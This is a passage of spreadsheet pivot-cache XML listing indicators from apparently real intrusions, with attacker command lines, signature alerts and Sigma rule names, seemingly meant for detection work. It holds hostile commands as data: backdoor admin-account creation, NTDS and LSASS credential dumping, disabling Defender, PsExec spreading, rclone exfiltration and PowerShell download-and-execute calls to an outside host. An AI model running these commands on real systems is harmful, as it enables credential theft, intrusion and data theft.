    <x v="4"/>
  </r>
  <r>
    <x v="249"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_command_line&quot;: &quot;svchost.exe -k UnistackSvcGroup&quot;, &quot;process_command_line&quot;: &quot;rundll32.exe C:\Users\USER\AppData\Local\Temp\randomstring.dll,EntryPoint&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="250"/>
    <x v="0"/>
    <s v="htool"/>
    <s v="AnyDesk"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="251"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net user sqlbackup qc69t4b#z0ke3 /add"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="252"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net user localadmin qc69t4b#z0ke3 /add"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="253"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup administrators localadmin /add"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="254"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;service_install&quot;, &quot;file_name&quot;: c:\Program Files (x86)\AnyDesk\AnyDesk.exe --service&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="255"/>
    <x v="7"/>
    <s v="cmdline"/>
    <s v="ntdsutil &quot;ac in ntds&quot; &quot;ifm&quot; &quot;create full c:\windows\temp\crashpad\x&quot; q q"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="256"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="ntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="257"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all  "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="258"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net view /all /domain"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="259"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="260"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup &quot;administrator&quot;"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="261"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;domain admins&quot; /dom "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="262"/>
    <x v="29"/>
    <s v="cmdline"/>
    <s v="ipconfig /all"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="263"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /dclist "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="264"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;Domain Admins&quot; /dom"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="265"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="tasklist"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="266"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net  localgroup Administrateurs"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="267"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup Administrators"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="268"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="SYSTEMINFO"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="269"/>
    <x v="29"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;cmd.exe /c ipconfig&quot;, &quot;initiating_process_command_line&quot;: &quot;rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="270"/>
    <x v="29"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;cmd.exe /c ipconfig /all&quot;, &quot;initiating_process_command_line&quot;: &quot;rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="271"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;cmd.exe /c ping&quot;, &quot;initiating_process_command_line&quot;: &quot;rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="272"/>
    <x v="17"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;cmd.exe /c nltest /dclist&quot;, &quot;initiating_process_command_line&quot;: &quot;rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="273"/>
    <x v="1"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;cmd.exe /c net group &quot;Domain Admins&quot; /dom&quot;, &quot;initiating_process_command_line&quot;: &quot;rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="274"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;cmd.exe /c tasklist&quot;, &quot;initiating_process_command_line&quot;: &quot;rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="275"/>
    <x v="1"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;cmd.exe /c net localgroup administators&quot;, &quot;initiating_process_command_line&quot;: &quot;rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="276"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;cmd.exe /c systeminfo&quot;, &quot;initiating_process_command_line&quot;: &quot;rundll32.exe c:\users\uname\appdata\local\temp\37b.dll, entrypoint&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="277"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot; "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="278"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="279"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalunit)&quot; "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="280"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -sc trustdmp "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="281"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -subnets -f (objectcategory=subnet)  "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="282"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="283"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="284"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net use "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="285"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="netstat -ano"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="286"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="287"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="arp -a "/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="288"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="ping -n 1 hostname &gt;&gt; C:\programdata\log.txt"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="289"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="Advanced_IP_Scanner_2.5.3850.exe"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="290"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shares.txt"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="291"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Get-NetDomain"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="292"/>
    <x v="16"/>
    <s v="cmdline"/>
    <s v="Get-NetCurrentUser"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="293"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Get-ADDomainController"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="294"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Get-ADDomainController -Filter * | ft"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="295"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Get-ADComputer -Filter * -Properties * | Get-Member"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="296"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Get-ADDomain"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="297"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="dir &quot;\\hostname\c$\Program Files\* &gt;&gt; C:\programdata\AV.txt"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="298"/>
    <x v="19"/>
    <s v="cmdline"/>
    <s v="rclone.exe copy--max-age 3y &quot;\\&lt;redacted&gt;\C$\Shares&quot; remote: &lt;redacted&gt;\&lt;redacted&gt; --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P "/>
    <s v="CMDline args _x000a_- copy: Copy the source to the destination _x000a_- --max-age: Only transfer files younger than &lt;time&gt; _x000a_- \\&lt;redacted&gt;B: From source _x000a_- remote: &lt;redacted&gt;\&lt;redacted&gt;: To destination folder _x000a_- Bwlimit 2M: Bandwidth limit _x000a_- -q: quiet _x000a_- --ignore-existing: Skip all files that exist on destination _x000a_- --auto-confirm: Do not request console confirmation _x000a_- --multi-thread-streams: Max number of streams to use for multi-thread downloads _x000a_- --transfers: Number of file transfers to run in parallel _x000a_- -P: Show progress"/>
    <x v="4"/>
  </r>
  <r>
    <x v="299"/>
    <x v="0"/>
    <s v="etpro"/>
    <s v="ET TROJAN Observed Malicious SSL Cert (BazaLoader CnC) _x000a_ET MALWARE Observed Malicious SSL Cert (Bazar Backdoor) _x000a_ET POLICY IP Check Domain (myexternalip .com in TLS SNI) _x000a_ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software) _x000a_ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent _x000a_ET POLICY HTTP POST to MEGA Userstorage"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="300"/>
    <x v="17"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;cmd c/ nltest /domain_trusts /all_trusts&quot;, &quot;C:\Windows\system32\svchost.exe -k UnistackSvcGroup&quot;}"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="301"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="302"/>
    <x v="7"/>
    <s v="cmdline"/>
    <s v="ntdsutil &quot;ac in ntds&quot; &quot;ifm&quot; &quot;cr fu C:\Perflogs\1&quot; q q "/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="303"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="systeminfo"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="304"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /dclist:&lt;hidden&gt;.local"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="305"/>
    <x v="17"/>
    <s v="cmdline"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="306"/>
    <x v="1"/>
    <s v="cmdline"/>
    <s v="net localgroup Administrators"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="307"/>
    <x v="23"/>
    <s v="cmdline"/>
    <s v="whoami.exe&quot; /groups"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="308"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="309"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="310"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot;"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="311"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="312"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="313"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="314"/>
    <x v="20"/>
    <s v="cmdline"/>
    <s v="adfind.exe -sc trustdmp "/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="315"/>
    <x v="31"/>
    <s v="cmdline"/>
    <s v="Get-NetSubnet"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="316"/>
    <x v="31"/>
    <s v="cmdline"/>
    <s v="Get-NetComputer –ping "/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="317"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="318"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="IEX(New - Object Net.Webclient).DownloadString('http://IP:port/')"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="319"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="320"/>
    <x v="15"/>
    <s v="cmdline"/>
    <s v="wmic /node: DEVICE LOCAL process call create &quot;c:\Users\165.bat&quot;"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="321"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="start PsExec.exe -accepteula @C:\share$\comps1.txt -u &quot;domain\User&quot; -p &quot;$PASSWORD&quot; cmd /c COPY &quot;\\DOMAINCONTROLLER\share$\fQumH.exe&quot; &quot;C:\windows\temp\&quot;"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="322"/>
    <x v="22"/>
    <s v="cmdline"/>
    <s v="start PsExec.exe -accepteula -d @C:\share$\comps5.txt -u &quot;domain\User&quot; -p &quot;$PASSWORD&quot; cmd /c &quot;C:\windows\temp\fQumH.exe&quot;"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="323"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="regsvr32 /s C:\Users\user\appdata\local\temp\random.dll"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="324"/>
    <x v="3"/>
    <s v="cmdline"/>
    <s v="cmd /c powershell.exe -nop -hiddend -c &quot;IEX ((new-object net.webclient).downloadstring('https://onlineworkercz.com:443/ahwjehefj'))&quot;"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="325"/>
    <x v="0"/>
    <s v="etpro"/>
    <s v="ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) _x000a_ET CNC Feodo Tracker Reported CnC Server group 1 _x000a_ET CNC Feodo Tracker Reported CnC Server group 2 _x000a_ET CNC Feodo Tracker Reported CnC Server group 3 _x000a_ET CNC Feodo Tracker Reported CnC Server group 5 _x000a_ET CNC Feodo Tracker Reported CnC Server group 8 _x000a_ET CNC Feodo Tracker Reported CnC Server group 9 _x000a_ET CNC Feodo Tracker Reported CnC Server group 19 _x000a_ET CNC Feodo Tracker Reported CnC Server group 22 _x000a_ET CNC Feodo Tracker Reported CnC Server group 23 _x000a_ET CNC Feodo Tracker Reported CnC Server group 24 _x000a_ET POLICY HTTP traffic on port 443 (POST) _x000a_ET POLICY PE EXE or DLL Windows file download HTTP _x000a_ET POLICY curl User-Agent Outbound _x000a_ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response _x000a_ET INFO Executable Download from dotted-quad Host _x000a_ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 _x000a_ET MALWARE Trickbot Checkin Response _x000a_ET POLICY Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI) _x000a_ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration _x000a_ET MALWARE Win32/Trickbot Data Exfiltration _x000a_ET POLICY IP Check wtfismyip.com _x000a_GPL ATTACK_RESPONSE command completed _x000a_ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) _x000a_ET INFO Dotted Quad Host DLL Request _x000a_ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M3 _x000a_ET POLICY Possible External IP Lookup ipinfo.io "/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="326"/>
    <x v="14"/>
    <s v="file_name"/>
    <s v="netscan.exe"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="327"/>
    <x v="25"/>
    <s v="file_name"/>
    <s v="procdump.exe"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="328"/>
    <x v="20"/>
    <s v="file_path"/>
    <s v="C:\Windows\Temp\adf\ad_group.txt"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="329"/>
    <x v="20"/>
    <s v="file_path"/>
    <s v="C:\Windows\Temp\adf\trustdmp.txt"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="330"/>
    <x v="20"/>
    <s v="file_path"/>
    <s v="C:\Windows\Temp\adf\subnets.txt"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="331"/>
    <x v="20"/>
    <s v="file_path"/>
    <s v="C:\Windows\Temp\adf\ad_ous.txt"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="332"/>
    <x v="20"/>
    <s v="file_path"/>
    <s v="C:\Windows\Temp\adf\ad_computers.txt"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="333"/>
    <x v="20"/>
    <s v="file_path"/>
    <s v="C:\Windows\Temp\adf\ad_users.txt "/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="334"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Windows\Temp\Dogi"/>
    <s v="bloodhound results"/>
    <x v="5"/>
  </r>
  <r>
    <x v="335"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\share$"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="336"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\&lt;uname&gt;\AppData\LocalTemp\tdr58DD.exe"/>
    <s v="beacon"/>
    <x v="5"/>
  </r>
  <r>
    <x v="337"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' c:\windows\system32\cmd.exe /c echo b30f789ed5b &gt; \\. \pipe\2b5fe9 ''', &quot;initiating_process_command_line&quot;: &quot;wuauclt.exe&quot;}"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="338"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;service_install&quot;, &quot;file_name&quot;: &quot;%COMPSEC % /b /c start /b /min powershell -nop -w hidden -encodedcommand&quot;}"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="339"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' esentutl /p /o c:\Users\user\AppData\Local\Temp\grabber_temp.edb '''}"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="340"/>
    <x v="32"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' wmic /node: &quot;DEVICE.LOCAL&quot; process call create &quot;c:\Perflogs\procdump.exe -accepteula -ma lsass &quot;c:\PerLogs\lsass.dmp&quot; '''}"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="341"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;http_request&quot;, &quot;http_method&quot; : &quot;GET&quot;, &quot;http_url&quot; : &quot;IP/cert/bec_http_222_x86_13567_1.exe&quot; , &quot;user_agent&quot; : &quot;curl/7.74.0&quot;}"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="342"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Abused Debug Privilege by Arbitrary Parent Processes - d522eca2-2973-4391-a3e0-ef0374321dae"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="343"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Accessing WinAPI in PowerShell. Code Injection. - eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="344"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Bad Opsec Powershell Code Artifacts - 73e733cc-1ace-3212-a107-ff2523cc9fc3"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="345"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Dridex Process Pattern - e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="346"/>
    <x v="17"/>
    <s v="sigma"/>
    <s v="Domain Trust Discovery - 3bad990e-4848-4a78-9530-b427d854aac0"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="347"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="CreateMiniDump Hacktool - 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="348"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="CobaltStrike Service Installations - 5a105d34-05fc-401e-8553-272b45c1522d"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="349"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="LSASS Memory Dump - 5ef9853e-4d0e-4a70-846f-a9ca37d876da"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="350"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Local Accounts Discovery - 502b42de-4306-40b4-9596-6f590c81f073"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="351"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) - 2afafd61-6aae-4df4-baed-139fa1f4c345"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="352"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Execution from Suspicious Folder - 3dfd06d2-eaf4-4532-9555-68aca59f57c4"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="353"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Malicious Base64 Encoded PowerShell Keywords in Command Lines - 26c6093-6f14-4b12-800f-0fcb46f5ffd0"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="354"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Malicious PowerShell Commandlets - 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="355"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="LSASS Memory Dumping - ffa6861c-4461-4f59-8a41-578c39f3f23e"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="356"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Mimikatz Detection LSASS Access - 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="357"/>
    <x v="1"/>
    <s v="sigma"/>
    <s v="Net.exe Execution - 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="358"/>
    <x v="3"/>
    <s v="sigma"/>
    <s v="Windows PowerShell Web Request - 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="359"/>
    <x v="1"/>
    <s v="sigma"/>
    <s v="Windows Network Enumeration - 62510e69-616b-4078-b371-847da438cc03"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="360"/>
    <x v="23"/>
    <s v="sigma"/>
    <s v="Whoami Execution - e28a5a99-da44-436d-b7a0-2afc20a5f413"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="361"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Usage of Sysinternals Tools - 25ffa65d-76d8-4da5-a832-3f2b0136e133"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="362"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="UNC2452 Process Creation Patterns - 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="363"/>
    <x v="17"/>
    <s v="sigma"/>
    <s v="Trickbot Malware Recon Activity - 410ad193-a728-4107-bc79-4419789fcbf8"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="364"/>
    <x v="15"/>
    <s v="sigma"/>
    <s v="Suspicious WMI Execution - 526be59f-a573-4eea-b5f7-f0973207634d"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="365"/>
    <x v="25"/>
    <s v="sigma"/>
    <s v="Suspicious Use of Procdump on LSASS - 5afee48e-67dd-4e03-a783-f74259dcf998"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="366"/>
    <x v="25"/>
    <s v="sigma"/>
    <s v="Suspicious Use of Procdump - 03795938-1387-481b-9f4c-3f6241e604fe"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="367"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Suspicious Remote Thread Created - 66d31e5f-52d6-40a4-9615-002d3789a119"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="368"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Suspicious PowerShell Parent Process - 754ed792-634f-40ae-b3bc-e0448d33f695"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="369"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Suspicious In-Memory Module Execution - 5f113a8f-8b61-41ca-b90f-d374fa7e4a39"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="370"/>
    <x v="3"/>
    <s v="sigma"/>
    <s v="Suspicious Encoded PowerShell Command Line - ca2092a1-c273-4878-9b4b-0d60115bf5ea"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="371"/>
    <x v="20"/>
    <s v="sigma"/>
    <s v="Suspicious AdFind Execution - 75df3b17-8bcc-4565-b89b-c9898acef911"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="372"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Rundll32 Internet Connection - cdc8da7d-c303-42f8-b08c-b4ab47230263"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="373"/>
    <x v="30"/>
    <s v="sigma"/>
    <s v="Regsvr32 Anomaly - 8e2b24c9-4add-46a0-b4bb-0057b4e6187d"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="374"/>
    <x v="0"/>
    <s v="sigma"/>
    <s v="Rare Service Installs - 66bfef30-22a5-4fcd-ad44-8d81e60922ae"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="375"/>
    <x v="22"/>
    <s v="sigma"/>
    <s v="PsExec Tool Execution - 42c575ea-e41e-41f1-b248-8093c3e82a28"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="376"/>
    <x v="22"/>
    <s v="sigma"/>
